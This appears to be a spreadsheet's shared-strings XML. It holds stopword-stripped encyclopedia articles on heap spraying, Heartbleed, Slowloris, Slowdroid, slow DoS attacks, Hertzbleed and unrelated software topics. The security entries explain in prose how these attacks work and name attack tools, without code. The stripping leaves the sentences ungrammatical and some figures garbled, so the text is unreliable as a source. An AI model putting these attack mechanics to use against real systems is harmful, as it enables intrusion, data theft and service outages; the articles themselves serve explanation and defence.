    <t>Heap spraying</t>
  </si>
  <si>
    <t>computer security, heap spraying technique used exploits facilitate arbitrary code execution. part source code exploit implements technique called heap spray. general, code sprays heap attempts certain sequence bytes predetermined location memory target process allocate (large) blocks process's heap fill bytes blocks right values. operation heap spray actually exploit security issues used make vulnerability easier exploit. heap spray cannot used break security boundaries: separate security issue needed. exploiting security issues often hard various factors influence process. chance alignments memory timing introduce randomness (from attacker's point view). heap spray used introduce large amount order compensate increase chances successful exploitation. heap sprays take advantage fact architectures operating systems, start location large heap allocations predictable consecutive allocations roughly sequential. this means sprayed heap roughly location every time heap spray run. exploits often specific bytes spray heap, data stored heap serves multiple roles. during exploitation security issue, application code often made read address arbitrary location memory. this address used code address function execute. exploit force application read address sprayed heap, control flow execution code uses address function pointer redirects sprayed heap. exploit succeeds redirecting control flow sprayed heap, bytes executed, allowing exploit perform whatever actions attacker wants. therefore, bytes heap restricted represent valid addresses within heap spray itself, holding valid instructions target architecture, application crash. therefore common spray single byte translates valid address nop-like instruction target architecture. this allows heap spray function large sled (for example, 0x0c0c0c0c often used non-canonical nop) history heap sprays used occasionally exploits since least 2001, technique started widespread exploits browsers summer 2005 release several exploits used technique wide range bugs internet explorer. heap sprays used exploits similar, showed versatility technique ease use, without need major modifications exploits. proved simple enough understand allow novice hackers quickly write reliable exploits many types vulnerabilities browsers browser plug-ins. many browser exploits heap spraying consist heap spray copy-pasted previous exploit combined small piece script html triggers vulnerability. implementation javascript heap sprays browsers commonly implemented javascript spray heap creating large strings. common technique used start string character concatenate over. this way, length string grow exponentially maximum length allowed scripting engine. depending browser implements strings, either ascii unicode characters used string. heap spraying code makes copies long string shellcode stores array, point enough memory sprayed ensure exploit works. vbscript occasionally, vbscript used internet explorer create strings using string function. actionscript july 2009, exploits found using actionscript spray heap adobe flash. images though proven heap-spraying done means, instance loading image files process, seen widespread august 2008). html5 september 2012, technique presented eusecwest 2012. core researchers, federico muttis anibal sacco, showed heap sprayed high allocation granularity technologies introduced html5. specifically, used low-level bitmap interface offered canvas api, workers quickly. detection prevention nozzle project microsoft research aims detect prevent heap spraying. bubble another countermeasure could considered detect prevent attack triggered spraying heap also slide sled, technique complementary heap spraying heap feng shui, technique manipulating heap layout spraying references</t>
  </si>
  <si>
    <t>Heartbleed</t>
  </si>
  <si>
    <t>heartbleed security openssl cryptography library, widely used implementation transport layer security (tls) protocol. introduced software 2012 publicly disclosed april 2014. heartbleed could exploited regardless whether vulnerable openssl instance running server client. resulted improper input validation (due missing bounds check) implementation heartbeat extension. thus, bug's name derived heartbeat. vulnerability classified buffer over-read, situation data read allowed.heartbleed registered common vulnerabilities exposures database cve-2014-0160. federal canadian cyber incident response centre issued security bulletin advising system administrators bug. fixed version openssl released april 2014, heartbleed publicly disclosed.system administrators frequently slow patch systems. 2014, 1.5% 800,000 popular tls-enabled websites still vulnerable heartbleed. june 2014, 309,197 public servers remained vulnerable. january 2017, according report shodan, nearly 180,000 internet-connected devices still vulnerable. july 2017, number dropped 144,000, according search shodan.io "vuln:cve-2014-0160". july 2019, shodan reported 91,063 devices vulnerable. u.s. first 21,258 (23%), countries 56,537 (62%), remaining countries 34,526 (38%). report also broke devices categories organization (the wireless companies), product (apache httpd, nginx), service (https, 81%). implementations openssl, gnutls, mozilla's network security services, windows platform implementation tls, affected defect existed openssl's implementation rather protocol itself. history heartbeat extension transport layer security (tls) datagram transport layer security (dtls) protocols proposed standard february 2012 6520. provides test keep alive secure communication links without need renegotiate connection time. 2011, rfc's authors, robin seggelmann, ph.d. student fachhochschule münster, implemented heartbeat extension openssl. following seggelmann's request result work openssl, change reviewed stephen henson, openssl's four core developers. henson failed notice seggelmann's implementation, introduced flawed code openssl's source code repository december 2011. defect spread release openssl version 1.0.1 march 2012. heartbeat support enabled default, causing affected versions vulnerable. discovery according mark openssl, neel mehta google's security team privately reported heartbleed openssl team april 2014 11:09 utc.the named engineer synopsys software integrity group, finnish cyber security company also created bleeding heart logo launched domain heartbleed.com explain public. while google's security team reported heartbleed openssl first, google codenomicon discovered independently approximately time. codenomicon reports april 2014 date discovery date notification ncsc vulnerability coordination. time disclosure, (around half million) internet's secure servers certified trusted authorities believed vulnerable attack, allowing theft servers' private keys users' session cookies passwords. electronic frontier foundation, technica, bruce schneier deemed heartbleed "catastrophic". forbes cybersecurity columnist joseph steinberg wrote:some might argue heartbleed worst vulnerability found least terms potential impact) since commercial traffic began flow internet. british cabinet spokesman recommended that: people take advice changing passwords websites use. most websites corrected best placed advise action, any, people need take. disclosure, project advised: need strong anonymity privacy internet, might want stay away internet entirely next days things settle. sydney morning herald published timeline discovery april 2014, showing organizations able patch public disclosure. cases, clear found out. bugfix deployment bodo möller adam langley google prepared heartbleed. resulting patch added hat's issue tracker march 2014. stephen henson applied openssl's version control system april. first fixed version, 1.0.1g, released day. june 2014, 309,197 public servers remained vulnerable. january 2017, according report shodan, nearly 180,000 internet-connected devices still vulnerable. number dropped 144,000 july 2017, according search shodan.io "vuln:cve-2014-0160". certificate renewal revocation according netcraft, 30,000 500,000+ x.509 certificates could compromised heartbleed reissued april 2014, although fewer revoked. 2014, affected sites reissued security certificates. addition, reissued security certificates used potentially compromised keys. netcraft stated:by reusing private key, site affected heartbleed still faces exactly risks replaced certificates. eweek said, "[heartbleed likely remain risk months, years, come." exploitation canada revenue agency reported theft social insurance numbers belonging taxpayers, said accessed exploit 6-hour period april 2014. after discovery attack, agency shut website extended taxpayer filing deadline april may. agency said would provide credit protection services cost anyone affected. april, rcmp announced charged computer science student relation theft unauthorized computer mischief relation data.the parenting site mumsnet several user accounts hijacked, impersonated. site later published explanation incident saying heartbleed technical staff patched promptly.anti-malware researchers also exploited heartbleed advantage order access secret forums used cybercriminals. studies also conducted deliberately setting vulnerable machines. example, april 2014, least independent researchers able steal private keys experimental server intentionally purpose cloudflare. also, april 2014, alex halderman, professor university michigan, reported honeypot server, intentionally vulnerable server designed attract attacks order study them, received numerous attacks originating china. halderman concluded fairly obscure server, attacks probably sweeping attacks affecting large areas internet.in august 2014, made public heartbleed vulnerability enabled hackers steal security keys community health systems, second-biggest for-profit u.s. hospital chain united states, compromising confidentiality million patient records. breach happened week heartbleed first made public. possible prior knowledge exploitation many major sites patched disabled heartbeat extension within days announcement, unclear whether potential attackers aware earlier extent exploited.based examinations audit logs researchers, reported attackers exploited flaw least five months discovery announcement. errata security pointed widely used non-malicious program called masscan, introduced months heartbleed's disclosure, abruptly terminates connection middle handshaking heartbleed, generating server messages, adding "two things producing error messages might seem like correlated, course, aren't." according bloomberg news, unnamed insider sources informed united states' national security agency aware flaw since shortly appearance but‍—‌instead reporting it‍—‌kept secret among unreported zero-day vulnerabilities order exploit nsa's purposes. denied claim, richard clarke, member national intelligence review group intelligence communications technologies reviewed united states' electronic surveillance policy; told reuters april 2014 known heartbleed. allegation prompted american government make, first time, public statement zero-day vulnerabilities policy, accepting recommendation review group's 2013 report asserted almost instances, widely used code, national interest eliminate software vulnerabilities rather intelligence collection", saying decision withhold move white house. behavior 6520 heartbeat extension tests tls/dtls secure communication links allowing computer connection send heartbeat request message, consisting payload, typically text string, along payload's length 16-bit integer. receiving computer must send exactly payload back sender.the affected versions openssl allocate memory buffer message returned based length field requesting message, without regard actual size message's payload. because failure proper bounds checking, message returned consists payload, possibly followed whatever else happened allocated memory buffer.heartbleed therefore exploited sending malformed heartbeat request small payload large length field vulnerable party (usually server) order elicit victim's response, permitting attackers read kilobytes victim's memory likely used previously openssl. where heartbeat request might party "send back four-letter word 'bird'", resulting response "bird", "heartbleed request" malicious heartbeat request) "send back 500-letter word 'bird'" would cause victim return "bird" followed whatever subsequent characters victim happened active memory. attackers could receive sensitive data, compromising confidentiality victim's communications. although attacker control disclosed memory block's size, control location, therefore cannot choose content revealed. affected openssl installations affected versions openssl openssl 1.0.1 1.0.1f (inclusive). subsequent versions (1.0.1g later) previous versions (1.0.0 branch older) vulnerable. installations affected versions vulnerable unless openssl compiled -dopenssl_no_heartbeats. vulnerable program function vulnerable program source files t1_lib.c d1_both.c vulnerable functions tls1_process_heartbeat() dtls1_process_heartbeat(). patch problem fixed ignoring heartbeat request messages data payload need. version 1.0.1g openssl adds bounds checks prevent buffer over-read. example, following test introduced determine whether heartbeat request would trigger heartbleed; silently discards malicious requests. openssl version control system contains complete list changes. impact data obtained heartbleed attack include unencrypted exchanges parties likely confidential, including form post data users' requests. moreover, confidential data exposed could include authentication secrets session cookies passwords, might allow attackers impersonate user service.an attack also reveal private keys compromised parties, would enable attackers decrypt communications (future past stored traffic captured passive eavesdropping, unless perfect forward secrecy used, case future traffic decrypted intercepted man-in-the-middle attacks).an attacker gained authentication material impersonate material's owner victim patched heartbleed, long material accepted (for example, password changed private revoked). heartbleed therefore constitutes critical threat confidentiality. however, attacker impersonating victim also alter data. indirectly, heartbleed's consequences thus beyond confidentiality breach many systems.a survey american adults conducted april 2014 showed percent heard heartbleed. among using internet, percent protected online accounts, example changing passwords canceling accounts; percent believed personal information risk heartbleed bug; percent believed personal information stolen. client-side vulnerability although received attention threat represents servers, clients using affected openssl instances also vulnerable. guardian therefore dubbed reverse heartbleed, malicious servers able exploit heartbleed read data vulnerable client's memory. security researcher steve gibson said heartbleed that:it's server-side vulnerability, also client-side vulnerability server, whomever connect able heartbeat back them. stolen data could contain usernames passwords. reverse heartbleed affected millions application instances. some vulnerable applications listed "software applications" section below. specific systems affected cisco systems identified products vulnerable, including phone systems telepresence (video conferencing) systems. websites online services analysis posted github visited websites april 2014 revealed vulnerabilities sites including yahoo!, imgur, stack overflow, slate, duckduckgo. following sites services affected made announcements recommending users update passwords response bug: canadian federal government temporarily shut online services canada revenue agency (cra) several government departments heartbleed security concerns. before online services shut down, hacker obtained approximately social insurance numbers. another canadian government agency, statistics canada, servers compromised also temporarily took services offline.platform maintainers like wikimedia foundation advised users change passwords.the servers lastpass vulnerable, additional encryption forward secrecy, potential attacks able exploit bug. however, lastpass recommended users change passwords vulnerable websites.the project recommended relay operators hidden service operators revoke generate fresh keys patching openssl, noted relays sets keys tor's multi-hop design minimizes impact exploiting single relay. relays later found susceptible heartbleed taken off-line precautionary measure.game-related services including steam, minecraft, wargaming, league legends, gog.com, origin, sony online entertainment, humble bundle, path exile affected subsequently fixed. software applications vulnerable software applications include: several hewlett-packard server applications, system management homepage (smh) linux windows. some versions filemaker libreoffice 4.2.0 4.2.2 (fixed 4.2.3) logmein claimed "updated many products parts services rely openssl". multiple mcafee products, particular versions software providing anti-viral coverage microsoft exchange, software firewalls, mcafee email gateways oracle mysql connector/c 6.1.0-6.1.3 connector/odbc 5.1.13, 5.2.5-5.2.6, 5.3.2 oracle data appliance (includes oracle linux primavera professional project management (includes primavera enterprise project portfolio management) winscp (ftp client windows) 5.5.2 earlier versions (only vulnerable tls/ssl, fixed 5.5.3) multiple vmware products, including vmware esxi 5.5, vmware player 6.0, vmware workstation series horizon products, emulators cloud computing suitesseveral oracle corporation applications affected. operating systems/firmware several linux distributions affected, including debian (and derivatives linux mint ubuntu) enterprise linux (and derivatives centos, oracle linux amazon linux), well following operating systems firmware implementations: android 4.1.1, used various portable devices. chris smith writes genius report version android affected popular version android (chitika claim 4.1.1 million devices; google describe less activated android devices). other android versions vulnerable either heartbeats disabled unaffected version openssl. firmware airport base stations firmware cisco systems routers firmware juniper networks routers pfsense 2.1.0 2.1.1 (fixed 2.1.2) dd-wrt versions including 19163 23881 (fixed 23882) western digital cloud product family firmware vulnerability testing services several services made available test whether heartbleed affects given site. however, many services claimed ineffective detecting bug. available tools include: tripwire securescan appcheck static binary scan fuzzing, synopsys software integrity group (formerly codenomicon) arbor network's pravail security analytics norton safeweb heartbleed check tool heartbleed testing tool european security company heartbleed test italian cryptographer filippo valsorda heartbleed vulnerability test cyberoam critical watch free online heartbleed tester metasploit heartbleed scanner module heartbleed server scanner rehmann lookout mobile security heartbleed detector, android devices determines openssl version device indicates whether vulnerable heartbeat enabled heartbleed checker hosted lastpass online network range scanner heartbleed vulnerability pentest-tools.com official offline scanner written python language qualys labs' server test looks heartbleed bug, also find ssl/tls implementation errors. browser extensions, chromebleed foxbleed diagnos crowdstrike heartbleed scanner scans routers, printers devices connected inside network including intranet sites. netcraft site report indicates whether website's confidentiality could jeopardized past exploitation heartbleed checking data netcraft's survey determine whether site offered heartbeat extension prior heartbleed disclosure. netcraft extensions chrome, firefox opera also perform check, whilst looking potentially compromised certificates.other security tools added support finding bug. example, tenable network security wrote plugin nessus vulnerability scanner scan fault. nmap security scanner includes heartbleed detection script version 6.45.sourcefire released snort rules detect heartbleed attack traffic possible heartbleed response traffic. open source packet analysis software wireshark tcpdump identify heartbleed packets using specific packet filters used stored packet captures live traffic. remediation vulnerability heartbleed resolved updating openssl patched version (1.0.1g later). openssl used either standalone program, dynamic shared object, statically-linked library; therefore, updating process require restarting processes loaded vulnerable version openssl well re-linking programs libraries linked statically. practice means updating packages link openssl statically, restarting running programs remove in-memory copy old, vulnerable openssl code.after vulnerability patched, server administrators must address potential breach confidentiality. because heartbleed allowed attackers disclose private keys, must treated compromised; pairs must regenerated, certificates must reissued; certificates must revoked. heartbleed also potential allow disclosure in-memory secrets; therefore, authentication material (such passwords) also regenerated. rarely possible confirm system affected compromised, determine whether specific piece information leaked.since difficult impossible determine credential might compromised might used attacker, certain systems warrant additional remediation work even patching vulnerability replacing credentials. example, signatures made keys vulnerable openssl version might well made attacker; raises possibility integrity violated, opens signatures repudiation. validation signatures legitimacy authentications made potentially compromised (such client certificate use) must done regard specific system involved. browser security certificate revocation awareness since heartbleed threatened privacy private keys, users website compromised could continue suffer heartbleed's effects browser made aware certificate revocation compromised certificate expires. reason, remediation also depends users making browsers up-to-date certificate revocation lists ocsp support) honour certificate revocations. root causes, possible lessons, reactions although evaluating total cost heartbleed difficult, eweek estimated us$500 million starting point.david wheeler's paper prevent next heartbleed analyzes heartbleed discovered earlier, suggests several techniques could faster identification, well techniques could reduced impact. according wheeler, efficient technique could prevented heartbleed test suite thoroughly performing robustness testing, i.e. testing invalid inputs cause failures rather successes. wheeler highlights single general-purpose test suite could serve base implementations.according article conversation written robert merkel, heartbleed revealed massive failure risk analysis. merkel thinks openssl gives importance performance security, longer makes sense opinion. merkel considers openssl blamed much openssl users, chose openssl, without funding better auditing testing. merkel explains aspects determine risk similar bugs cause vulnerabilities. one, library's source code influences risk writing bugs impact. secondly, openssl's processes affect chances catching bugs quickly. first aspect, merkel mentions programming language risk factor favored heartbleed's appearance, echoing wheeler's analysis.on aspect, theo raadt, founder leader openbsd openssh projects, criticized openssl developers writing memory management routines thereby, claims, circumventing openbsd standard library exploit countermeasures, saying "openssl developed responsible team." following heartbleed's disclosure, members openbsd project forked openssl libressl.the author change introduced heartbleed, robin seggelmann, stated missed validating variable containing length denied intention submit flawed implementation. following heartbleed's disclosure, seggelmann suggested focusing second aspect, stating openssl reviewed enough people. although seggelmann's work reviewed openssl core developer, review also intended verify functional improvements, situation making vulnerabilities much easier miss. openssl core developer laurie claimed security audit openssl would caught heartbleed. software engineer john walsh commented: think openssl [fulltime] people write, maintain, test, review 500,000 lines business critical code. openssl foundation's president, steve marquess, said "the mystery overworked volunteers missed bug; mystery happened often." david wheeler described audits excellent find vulnerabilities typical cases, noted "openssl uses unnecessarily complex structures, makes harder humans machines review." wrote: there continuous effort simplify code, otherwise adding capabilities slowly increase software complexity. code refactored time make simple clear, constantly features. goal code "obviously right", opposed code complicated can't problems". libressl made code cleanup, removing 90,000 lines code first week.according security researcher kaminsky, heartbleed sign economic problem needs fixed. seeing time taken catch simple error simple feature "critical" dependency, kaminsky fears numerous future vulnerabilities nothing done. when heartbleed discovered, openssl maintained handful volunteers, worked full-time. yearly donations openssl project us$2,000. heartbleed website codenomicon advised money donations openssl project. after learning donations days following heartbleed's disclosure totaling us$841, kaminsky commented building important technologies global economy shockingly underfunded infrastructure." core developer laurie qualified project "completely unfunded". although openssl software foundation bounty program, internet bounty initiative awarded us$15,000 google's neel mehta, discovered heartbleed, responsible disclosure. mehta later donated reward freedom press foundation fundraiser.paul chiusano suggested heartbleed resulted failed software economics.the industry's collective response crisis core infrastructure initiative, multimillion-dollar project announced linux foundation april 2014 provide funds critical elements global information infrastructure. initiative intends allow lead developers work full-time projects security audits, hardware software infrastructure, travel, expenses. openssl candidate become first recipient initiative's funding.after discovery google established project zero tasked finding zero-day vulnerabilities help secure society. references bibliography external links summary codenomicon information canadian organizations individuals list security notices</t>
  </si>
  <si>
    <t>Smack (software)</t>
  </si>
  <si>
    <t>smack (full name: simplified mandatory access control kernel) linux kernel security module protects data process interaction malicious manipulation using custom mandatory access control (mac) rules, simplicity main design goal. officially merged since linux 2.6.25 release, main access control mechanism meego mobile operating system. also used sandbox html5 applications tizen architecture, commercial wind river linux solutions embedded device development, philips digital products., intel's ostro devices.since 2016, smack required automotive grade linux (agl) implementations provides association linux facilities base security framework. design smack consists three components: kernel module implemented linux security module. works best file systems support extended attributes. startup script ensures device files correct smack attributes loads smack configuration. patches core utilities package make aware smack extended file attributes. similar patches busybox also created. smack require user-space support. criticism smack criticized written module instead selinux security policy provide equivalent functionality. such selinux policies proposed, none demonstrated. smack's author replied would practical selinux's complicated configuration syntax philosophical difference smack selinux designs. references further reading jake edge (2007-08-08). "smack simplified access control". linux weekly news. jonathan corbet (2007-02-10). "smack meets true security module". linux weekly news. casey schaufler (january 2008). "the simplified mandatory access control kernel" (ppt). linux.conf.au. archived original 2014-01-11. session video (ogg). melbourne, australia. jake edge (2008-08-06). "ottawa linux symposium: smack embedded devices". linux weekly news. casey schaufler (july 2008). "smack embedded computing" (pdf). proceedings linux symposium. vol. 186–197. archived original (pdf) 2013-06-29. jake edge (2009-10-07). "linux plumbers conference: three sessions security track". linux weekly news. elena reshetova, casey schaufler (november 2010). "mobile simplified security framework overview" (pdf). meego conference. archived original (pdf) 2012-07-25.</t>
  </si>
  <si>
    <t>Slowloris (computer security)</t>
  </si>
  <si>
    <t>slowloris type denial service attack tool allows single machine take another machine's server minimal bandwidth side effects unrelated services ports. slowloris tries keep many connections target server open hold open long possible. accomplishes opening connections target server sending partial request. periodically, send subsequent http headers, adding never completing, request. affected servers keep connections open, filling maximum concurrent connection pool, eventually denying additional connection attempts clients.the program named slow lorises, group primates known slow movement. affected servers this includes necessarily limited following, attack's author: apache dhttpd websense "block pages" (unconfirmed) trapeze wireless portal (unconfirmed) verizon's mi424-wr fios cable modem (unconfirmed) verizon's motorola set-top (port 8082 requires auth unconfirmed) beeware (unconfirmed) deny (patched) flask (development server)because slowloris exploits problems handling thousands connections, attack less effect servers handle large numbers connections well. proxying servers caching accelerators varnish, nginx, squid recommended mitigate particular kind attack. addition, certain servers resilient attack design, including hiawatha, iis, lighttpd, cherokee, cisco css. mitigating slowloris attack while reliable configurations affected servers prevent slowloris attack, ways mitigate reduce impact attack. general, involve increasing maximum number clients server allow, limiting number connections single address allowed make, imposing restrictions minimum transfer speed connection allowed have, restricting length time client allowed stay connected. apache server, number modules used limit damage caused slowloris attack; apache modules mod_limitipconn, mod_qos, mod_evasive, security, mod_noloris, mod_antiloris suggested means reducing likelihood successful slowloris attack. since apache 2.2.15, apache ships module mod_reqtimeout official solution supported developers.other mitigating techniques involve setting reverse proxies, firewalls, load balancers content switches. administrators could also change affected server software unaffected form attack. example, lighttpd nginx succumb specific attack. notable usage during protests erupted wake 2009 iranian presidential election, slowloris arose prominent tool used leverage attacks sites iranian government. belief flooding ddos attacks would affect internet access government protesters equally, significant bandwidth consume. slowloris attack chosen instead, high impact relatively bandwidth. number government-run sites targeted attacks, including gerdab.ir, leader.ir, president.ir.a variant attack used spam network river city media force gmail servers send thousands messages bulk, opening thousands connections gmail message sending requests, completing once. similar software since release, number programs appeared mimic function slowloris providing additional functionality, running different environments: pyloris protocol-agnostic python implementation supporting socks proxies. slowloris python implementation slowloris socks proxy support. goloris slowloris nginx, written slowloris distributed golang implementation qslowloris executable form slowloris designed windows, featuring front end. unnamed version http server. slowhttptest highly configurable slow attacks simulator, written c++. slowlorischecker slowloris slow post (proof concept). written ruby. cyphon slowloris written objective-c. sloww slowloris implementation written node.js. dotloris slowloris written .net core slowdroid enhanced version slowloris written java, reducing minimum attack bandwidth also slowdroid trinoo stacheldraht denial service land orbit cannon high orbit cannon redos r-u-dead-yet references external links slowloris http hackaday slowloris apache attacked "slow loris" article lwn.net slowloris short video (including demo) home page slowhttptest attempt simulating slowloris loic blog post explaining inner workings slowloris</t>
  </si>
  <si>
    <t>Slowdroid</t>
  </si>
  <si>
    <t>slowdroid first denial service attack allows single mobile device take network server requiring minimal bandwidth. attack created research purposes enrico cambiaso maurizio aiello ieiit institute national research council italy released android application. slowdroid behavior similar slow attacks slowloris, since creates many connections victim order saturate resources listening daemon application. difference sent payload, case slowdroid compliant specific protocol: instead sending forged http request, endless sequence spaces sent instead. this characteristic makes slowdroid able target different protocols payload. another difference sending: data sending phase, instead sending sequence characters slowloris does, slowdroid sends single character, hence reducing bandwidth amounts. finally, main difference implementation: slowdroid implemented executed android mobile operating system platform. slowdroid initially published google play store. developers terms service, application removed store. slowdroid also used botnet used also anonymous group hacktivists. slowdroid mentioned official european commission document presented scientific conferences. also slowloris (computer security) trinoo stacheldraht denial service land orbit cannon high orbit cannon references</t>
  </si>
  <si>
    <t>Hengzhi chip</t>
  </si>
  <si>
    <t>hengzhi chip (chinese: pinyin: héngzhì, 联想"恒智"安全芯片) microcontroller store secured information, designed people's republic china government manufactured china. functionalities similar offered trusted platform module but, unlike tpm, follow trusted computing group specifications. lenovo selling installed hengzhi security chips. chip could development (embedded security subsystem) chip, public smart card placed directly motherboard's system management bus. september 2006, public specifications chip available. also trusted computing trusted platform module references external links lenovo releases china's first security chip does china your box?</t>
  </si>
  <si>
    <t>Slow DoS Attack</t>
  </si>
  <si>
    <t>term slow attack (abbreviated sda) introduced 2013, clearly define specific category denial service attacks make low-bandwidth rate accomplish purpose. similar terms found literature, application layer dos, focusing attacks targeting application layer only, slow attack exploit lower-layers iso/osi stack low-rate dos, focusing characteristics using limited amount attack bandwidth, hence, instance, including also exploit-based threatsparticularly, order reduce bandwidth, slow attack often acts application layer iso/osi stack (e.g. case timeout exploiting threats), although requirement. such layer however easier exploit order successfully attack victim even sending bytes malicious requests. purpose slow attack (often, always) cause unavailability network service, seizing connections daemon able concurrently manage, application layer. under condition, incoming connection, even potentially legitimate clients, accepted daemon, hence leading denial service. addition, connection established/sized attacker, adversary would keep alive long possible (hence, avoiding connection closures, could potentially free-up resources legitimate clients). order keep connections alive, reducing time attack bandwidth, considering single connection, data sent target service specific times, exploiting so-called wait timeout parameter, scheduling periodic data sending activity application layer): timeout expires, specific payload (depending attack type approach used malicious user) sent targeted daemon. while lower layers iso/osi stack, timeouts relatively short, case, assume particularly long values, order minutes. exploited parameters according cambiaso slow attacks exploit parameters characteristics tcp-based connections. such parameters exploited keep connections alive longer expected preserving attack bandwidth, hence seizing server resources long times, time reducing attack resources. also slowloris (computer security) slowdroid trinoo stacheldraht denial service land orbit cannon high orbit cannon references</t>
  </si>
  <si>
    <t>Slony-I</t>
  </si>
  <si>
    <t>slony-i asynchronous master-slave replication system postgresql dbms, providing support cascading failover. asynchronous means database transaction committed master server, guaranteed available slaves. cascading means replicas created (and updated) replicas, i.e. directly connect master. terminology name "slony" comes russian word "слоны" means "elephants". this reference postgresql elephant logo, well "tip hat" vadim mikheev, came core ideas slony-i uses work. note whole related terminology: slony plural word elephants, indicates cluster consists multiple databases slon singular word elephant; replication node managed program named "slon", aggregate together aforementioned "cluster elephants" slonik word "little elephant," name program used configure cluster. effect, "little elephant" tells cluster, "here's need do!" unique features unlike many replication solutions postgresql, slony-i tied particular version database, makes possible upgrade database cluster node time, without material downtime. (version 2.0.0 requires postgresql 8.3+, though) also postgresql replication (computer science) references external links slony-i official website slony tutorial: setup slony-i replication postgres plus</t>
  </si>
  <si>
    <t>Slipstream (computing)</t>
  </si>
  <si>
    <t>SlimRoms</t>
  </si>
  <si>
    <t>slimroms (also slim7, slim6, slimlp, slimkat slimbean) android custom rom. main feature many setting options user interface. since september 2015 slimroms great britain, previously germany. features name current slimroms version usually composed slim code name android version used. exception current version called slim6 (android version: marshmallow). some features longer included slimroms since slimlp. cases reason change user interface android introduction material design android upwards. features longer available since slimlp trds with "the real dark slim" option (trds) dark backgrounds menu versions slimkat slimbean coloured deep black dark grey like e.g. stock-android. furthermore, google apps partially inverted. light backgrounds became black font turned white. this option could optionally adjusted automatically depending lighting conditions. slimpie with slimpie customizable menu based cyanogenmod's pie, appeared semicircular touched edge screen. this allowed shortcuts apps functions without navigating menus. dialer dialer slimrom allows browse telephone books additionally displays corresponding telephone book entries incoming calls. however, function available canada usa. shake events shake events allowed user start certain apps lock device shaking here could whether distinction made horizontal vertical shaking. camera camera enhanced smartcapture trueview functions. former intended enable particularly short shutter release times, latter intended display entire area captured camera. characteristics affected google apps licensing reasons almost custom roms google apps pre-installed, installed later recovery (e.g. twrp). launcher default, google launcher slim launcher installed, user chooses setting first time. special feature slimrom detailed setting options graphical user interface: among things, start quick settings menu changed, entries added removed. addition, possible change color sometimes like battery symbol shape individual entries power menu status bar. behavior animations scrolling menus also adjusted. user choose different animations. slimrecents menu recently used applications also revised renamed slimrecents. sidebar appears, showing recently used applications. special feature slimrom also displayed left side screen, e.g. enable left-handed users operate device easily. privacy guard slimrom so-called privacy guard, allows revoke permissions afterwards. this prevents potential security risks caused many authorizations part developers. root access superuser available, must enabled developer options first. rights management already pre-installed, subsequent installation corresponding apps necessary. superuser replaced slimlp cyanogenmod's privacyguard, however. notifications slimrom allows users notifications displayed bars bottom display. this option disabled default must enabled manually individually. another customization option custom ability display apps contacts notification bar. features introduced slimlp slim with slimdim, navigation dimmed level desired device user inactivity, buttons less conspicuous. when touched near buttons light again. availability currently different devices supported, list found former project page. however, devices latest version downloaded project page. reception march 2015 website difficulties infrastructure improvements highlighted developers. october 2015 project difficulties discussed detail. june 2016 announced slimroms' release slim6 marshmallow.in 2017 john hoff androidcommunity.com reviewed slim7 version 1.0, slimroms’ first stable nougat build. said came without unneeded bloat, fast result.resurrection remix partly based slimroms.in 2017 andreas hitzig pcwelt recommended slimroms "slimmer less demanding systems" alternatives cyanogenmod. also lineageos list custom android distributions references external links official website</t>
  </si>
  <si>
    <t>Hertzbleed</t>
  </si>
  <si>
    <t>hertzbleed theoretical hardware security attack describes exploiting dynamic frequency scaling reveal secret data. attack kind timing attack, bearing similarity previous power analysis vulnerabilities. hertzbleed dangerous power analysis, exploited remote attacker. disclosure cryptographic keys main concern regarding exploit.the exploit verified work intel processors, intel's security advisory stating intel processors affected. other processors using frequency scaling exist, attack tested them. neither intel planning release microcode patches, instead advising harden cryptography libraries vulnerability. mechanism normal timing attacks mitigated using constant-time programming, ensures instruction takes equally long, regardless input data. hertzbleed combines timing attack power analysis attack. power analysis attack measures power consumption deduce data processed. this, however, requires attacker able measure power consumption. hertzbleed exploits execution time differences caused dynamic frequency scaling, feature changes processor's frequency maintain power consumption temperature constraints. processor's frequency depends power consumption, turn depends data, remote attacker deduce data processed execution time. hertzbleed thus effectively bypasses constant-time programming, take account changes processor frequency. also side-channel attack references</t>
  </si>
  <si>
    <t>Snapshot (computer storage)</t>
  </si>
  <si>
    <t>computer systems, snapshot state system particular point time. term coined analogy photography. refer actual copy state system capability provided certain systems. rationale full backup large data take long time complete. multi-tasking multi-user systems, writes data backed this prevents backup atomic introduces version skew result data corruption. example, user moves file directory already backed file would completely missing backup media, since backup operation already taken place addition file. version skew also cause corruption files change size contents underfoot read. approach safely backing live data temporarily disable write access data backup, either stopping accessing applications using locking provided operating system enforce exclusive read access. this tolerable low-availability systems desktop computers small workgroup servers, regular downtime acceptable). high-availability 24/7 systems, however, cannot bear service stoppages. avoid downtime, high-availability systems instead perform backup snapshot—a read-only copy data frozen point time—and allow applications continue writing data. most snapshot implementations efficient create snapshots o(1). words, time needed create snapshot increase size data set; contrast, time required direct backup proportional size data set. systems initial snapshot taken data set, subsequent snapshots copy changed data only, system pointers reference initial snapshot. this method pointer-based snapshots consumes less disk capacity data repeatedly cloned. implementations volume managers some unix systems snapshot-capable logical volume managers. these implement copy-on-write entire block devices copying changed blocks‍—‌just overwritten within "parent" volumes‍—‌to storage, thus preserving self-consistent past image block device. filesystems snapshot images later mounted read-only media. some volume managers also allow creation writable snapshots, extending copy-on-write approach disassociating blocks modified within snapshot "parent" blocks original volume. such scheme could also described performing additional copy-on-write operations triggered writes snapshots. linux, logical volume manager (lvm) allows creation read-only read-write snapshots. writable snapshots introduced version (lvm2). file systems some file systems, wafl, fossil plan bell labs, ods-5, internally track versions files make snapshots available special namespace. others, like ufs2, provide operating system accessing file histories. ntfs, access snapshots provided volume shadow-copying service (vss) windows windows server 2003 shadow copy windows vista. melio provides snapshots interface shared storage. snapshots also available (novell storage services) file system netware since version 4.11, recently linux platforms open enterprise server product. emc's isilon onefs clustered storage platform implements single scalable file system supports read-only snapshots file directory level. file directory within file system snapshotted system implement copy-on-write point-in-time snapshot dynamically based method determined optimal system. linux, btrfs ocfs2 file systems support creating snapshots (cloning) individual files. additionally, btrfs also supports creation snapshots subvolumes. aix, jfs2 also support snapshots. microsystems hybrid implementation tracks read-write snapshots block level, makes branched file sets nameable user applications "clones". time machine, included apple's v10.5 operating system, snapshotting scheme system-level incremental backup service: merely watches mounted volumes changes copies changed files periodically specially-designated volume using hard links. this plus file system snapshotting feature; apple's apfs file system introduces feature. also application checkpointing logical volume manager (linux) persistence (computer science) sandbox (computer security) shadow copy storage hypervisor system image virtual machine notes references external links garimella, neeta (2006-04-26). "understanding exploiting snapshot technology data protection, part snapshot technology overview". harwood, mike (2003-09-24). "storage basics: backup strategies".</t>
  </si>
  <si>
    <t>Heuristic analysis</t>
